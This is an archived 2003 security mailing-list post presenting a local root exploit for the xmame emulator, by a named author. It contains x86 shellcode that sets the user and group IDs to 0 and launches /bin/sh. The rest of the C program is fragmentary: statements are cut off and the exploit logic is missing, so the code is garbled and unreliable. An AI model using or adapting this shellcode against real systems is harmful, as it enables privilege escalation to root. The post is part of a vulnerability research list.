|
|||||||||||
|
xmame gain root exploit
From: Gabriel A. Maggiotti <gmaggiot(at)ciudad.com.ar>
Date: Sat May 31 2003 - 10:36:41 EDT /* Web: http://qb0x.net Author: Gabriel A. Maggiotti Date: March 31, 2003 E-mail: gmaggiot@ciudad.com.ar ---------------------------------------------------------------------------*/ #define OFFSET 1058
int
unsigned char shellcode1[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80" // alarm(0);
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80" // setuid(0);
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80" // setgid(0);
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
if(argc != 2) {
fprintf(stderr,"usage: %s
return 0;
/* research-list@qb0x.net is dedicated to interactively researching vulnerab- ilities, report potential or undeveloped holes in any kind of computer system. To subscribe to research-list@qb0x.ne t send a blank email to research-list-subscribe@qb0x.net. More help available sending an email to research-list-help@qb0x.net. Note: the list doesn't allow html, it will be stripped from messages. */ Received on Tue Jun 3 14:42:37 2003 This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT |
||||||||||
|
|||||||||||